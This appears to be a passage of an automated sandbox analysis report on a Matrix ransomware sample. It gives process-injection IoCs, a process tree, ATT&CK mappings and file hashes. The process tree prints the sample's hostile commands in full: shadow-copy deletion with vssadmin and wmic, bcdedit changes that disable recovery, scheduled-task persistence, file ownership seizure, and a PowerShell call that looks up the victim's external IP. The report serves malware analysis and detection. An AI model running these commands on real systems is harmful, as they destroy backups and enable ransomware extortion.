Token: SeUndockPrivilege	1904	WMIC.exe
Token: SeManageVolumePrivilege	1904	WMIC.exe
Token: 33	1904	WMIC.exe
Token: 34	1904	WMIC.exe
Token: 35	1904	WMIC.exe
Token: SeDebugPrivilege	1956	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1824 wrote to memory of 1984	1824	907636b28d162f7110b067a8178fa38c.exe	28
PID 1824 wrote to memory of 1984	1824	907636b28d162f7110b067a8178fa38c.exe	28
PID 1824 wrote to memory of 1984	1824	907636b28d162f7110b067a8178fa38c.exe	28
PID 1824 wrote to memory of 1984	1824	907636b28d162f7110b067a8178fa38c.exe	28
PID 1824 wrote to memory of 1940	1824	907636b28d162f7110b067a8178fa38c.exe	30
PID 1824 wrote to memory of 1940	1824	907636b28d162f7110b067a8178fa38c.exe	30
PID 1824 wrote to memory of 1940	1824	907636b28d162f7110b067a8178fa38c.exe	30
PID 1824 wrote to memory of 1940	1824	907636b28d162f7110b067a8178fa38c.exe	30
PID 1824 wrote to memory of 436	1824	907636b28d162f7110b067a8178fa38c.exe	32
PID 1824 wrote to memory of 436	1824	907636b28d162f7110b067a8178fa38c.exe	32
PID 1824 wrote to memory of 436	1824	907636b28d162f7110b067a8178fa38c.exe	32
PID 1824 wrote to memory of 436	1824	907636b28d162f7110b067a8178fa38c.exe	32
PID 436 wrote to memory of 752	436	cmd.exe	34
PID 436 wrote to memory of 752	436	cmd.exe	34
PID 436 wrote to memory of 752	436	cmd.exe	34
PID 436 wrote to memory of 752	436	cmd.exe	34
PID 1824 wrote to memory of 1112	1824	907636b28d162f7110b067a8178fa38c.exe	35
PID 1824 wrote to memory of 1112	1824	907636b28d162f7110b067a8178fa38c.exe	35
PID 1824 wrote to memory of 1112	1824	907636b28d162f7110b067a8178fa38c.exe	35
PID 1824 wrote to memory of 1112	1824	907636b28d162f7110b067a8178fa38c.exe	35
PID 1824 wrote to memory of 1672	1824	907636b28d162f7110b067a8178fa38c.exe	36
PID 1824 wrote to memory of 1672	1824	907636b28d162f7110b067a8178fa38c.exe	36
PID 1824 wrote to memory of 1672	1824	907636b28d162f7110b067a8178fa38c.exe	36
PID 1824 wrote to memory of 1672	1824	907636b28d162f7110b067a8178fa38c.exe	36
PID 1112 wrote to memory of 2032	1112	cmd.exe	39
PID 1112 wrote to memory of 2032	1112	cmd.exe	39
PID 1112 wrote to memory of 2032	1112	cmd.exe	39
PID 1112 wrote to memory of 2032	1112	cmd.exe	39
PID 1672 wrote to memory of 940	1672	cmd.exe	40
PID 1672 wrote to memory of 940	1672	cmd.exe	40
PID 1672 wrote to memory of 940	1672	cmd.exe	40
PID 1672 wrote to memory of 940	1672	cmd.exe	40
PID 1112 wrote to memory of 1148	1112	cmd.exe	41
PID 1112 wrote to memory of 1148	1112	cmd.exe	41
PID 1112 wrote to memory of 1148	1112	cmd.exe	41
PID 1112 wrote to memory of 1148	1112	cmd.exe	41
PID 1112 wrote to memory of 1712	1112	cmd.exe	42
PID 1112 wrote to memory of 1712	1112	cmd.exe	42
PID 1112 wrote to memory of 1712	1112	cmd.exe	42
PID 1112 wrote to memory of 1712	1112	cmd.exe	42
PID 940 wrote to memory of 1312	940	wscript.exe	43
PID 940 wrote to memory of 1312	940	wscript.exe	43
PID 940 wrote to memory of 1312	940	wscript.exe	43
PID 940 wrote to memory of 1312	940	wscript.exe	43
PID 1312 wrote to memory of 1564	1312	cmd.exe	45
PID 1312 wrote to memory of 1564	1312	cmd.exe	45
PID 1312 wrote to memory of 1564	1312	cmd.exe	45
PID 1312 wrote to memory of 1564	1312	cmd.exe	45
PID 940 wrote to memory of 628	940	wscript.exe	46
PID 940 wrote to memory of 628	940	wscript.exe	46
PID 940 wrote to memory of 628	940	wscript.exe	46
PID 940 wrote to memory of 628	940	wscript.exe	46
PID 628 wrote to memory of 1988	628	cmd.exe	48
PID 628 wrote to memory of 1988	628	cmd.exe	48
PID 628 wrote to memory of 1988	628	cmd.exe	48
PID 628 wrote to memory of 1988	628	cmd.exe	48
PID 1976 wrote to memory of 1648	1976	taskeng.exe	50
PID 1976 wrote to memory of 1648	1976	taskeng.exe	50
PID 1976 wrote to memory of 1648	1976	taskeng.exe	50
PID 1824 wrote to memory of 1308	1824	907636b28d162f7110b067a8178fa38c.exe	52
PID 1824 wrote to memory of 1308	1824	907636b28d162f7110b067a8178fa38c.exe	52
PID 1824 wrote to memory of 1308	1824	907636b28d162f7110b067a8178fa38c.exe	52
PID 1824 wrote to memory of 1308	1824	907636b28d162f7110b067a8178fa38c.exe	52
PID 1308 wrote to memory of 1660	1308	cmd.exe	54

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1660	attrib.exe

C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe
"C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1824
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\907636b28d162f7110b067a8178fa38c.exe" "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe"
  2⤵
  PID:1984
- C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe
  "C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe" -n
  2⤵
  - Executes dropped EXE
  PID:1940
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\adUQEWSg.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rNwjBuHZ.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2032
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    - Matrix Ransomware
    PID:1712
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1312
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wADvx861.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:1564
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:628
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:1988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ghxOWIYe.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Views/modifies file attributes
    PID:1660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
    3⤵
    - Modifies file permissions
    PID:1252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe
      iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1620
    - - C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe
        
        iOwlD4KZ.exe -accepteula "DefaultID.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:1460

C:\Windows\system32\taskeng.exe
taskeng.exe {DCE71A13-7F60-41A9-8408-5C9D9CA2DA5D} S-1-5-21-2292972927-2705560509-2768824231-1000:GRXNNIIE\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wADvx861.bat"
  2⤵
  PID:1648
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
  - - C:\Windows\system32\vssadmin.exe
      "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1144
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1224
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1764
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:1548

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:964

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
C:\Users\Admin\AppData\Local\Temp\adUQEWSg.txt

Filesize
14B

MD5
325fab5962cc5892f8bc81bb9be6a83c

SHA1
d781a63073eb8df2ddc8392bdadfafa3ccb65dd3

SHA256
6a44791e6dadf62ea306230d75f7e4119a9d71ecc31a9965719c4371cb5515b7

SHA512
c60ac52cd6a37b513bd993a3ac6187b37c9cca8f1568d2a5c2594d02615d89f1dcce112466cc03f9c207466fc01b359b7787aa629991130e2cd96e501a093379

Download Submit
C:\Users\Admin\AppData\Local\Temp\ghxOWIYe.bat

Filesize
246B

MD5
6f18bfca2f6b54479135c75be39932c6

SHA1
55926f41201d18d6610fe9c72882a781d6a17bac

SHA256
5970694e003a654ef00ffa05f8c015a949badc79756359f7a6b4058f779bfaf4

SHA512
079a4ca3a14d303ad10f9836e7a39904ce7e790c3bda559f67053416391dfd7d4ec3c36d83308aab2e9d2c97b8d9ac61f2db4d257d33fe9d0067a5f7eb3b87b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\w5dCATEj.vbs

Filesize
260B

MD5
e1c3861f074fb4fb2b507d9b5c6f5d61

SHA1
0783a55d0d56ae5b92d1a4eae2223fee22c3f58d

SHA256
12e1bf618a32cbff2e91f6eec8b2cbd1591c6a655f2cb9f3a2e0829d8a54c06f

SHA512
5defac3d62f26b34d6c756d22acd34eee826d2374d33af44c9cf59d1466098dec6395d95045101f633ebf7eefa536036bb300ef2019f407644e3f67bd0338542

Download Submit
C:\Users\Admin\AppData\Roaming\wADvx861.bat

Filesize
415B

MD5
831afb00c9a3bc5de7d3f6625eeb3a71

SHA1
2de7b837cedc38ce7e04c44bd8abc99d691cd8ae

SHA256
2fe612320ebf2548fe25db8004796e3eeffa649610af62f90d44959f1c5cf05e

SHA512
ba601b874a2e017c272e789c64fe92491ae24a3baf08ec044d800ea66c5896a41b6eb7cefc5e76fb4e43b4b41a7f0ef2c5699685a90ccdf4efc6fda53054b429

Download Submit
\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
\Users\Admin\AppData\Local\Temp\NWYHhHYv.exe

Filesize
1.2MB

MD5
907636b28d162f7110b067a8178fa38c

SHA1
048ae4691fe267e7c8d9eda5361663593747142a

SHA256
6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

SHA512
501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

Download Submit
\Users\Admin\AppData\Local\Temp\iOwlD4KZ.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\iOwlD4KZ64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/752-66-0x0000000072D80000-0x000000007332B000-memory.dmp

Filesize
5.7MB

Download
memory/752-65-0x0000000072D80000-0x000000007332B000-memory.dmp

Filesize
5.7MB

Download
memory/1620-98-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1620-92-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1824-54-0x0000000075571000-0x0000000075573000-memory.dmp

Filesize
8KB

Download
memory/1912-97-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1912-91-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1956-109-0x000000000252B000-0x000000000254A000-memory.dmp

Filesize
124KB

Download
memory/1956-103-0x000007FEFB5C1000-0x000007FEFB5C3000-memory.dmp

Filesize
8KB

Download
memory/1956-104-0x000007FEF43B0000-0x000007FEF4DD3000-memory.dmp

Filesize
10.1MB

Download
memory/1956-106-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download
memory/1956-105-0x000007FEF3790000-0x000007FEF42ED000-memory.dmp

Filesize
11.4MB

Download
memory/1956-108-0x0000000002524000-0x0000000002527000-memory.dmp

Filesize
12KB

Download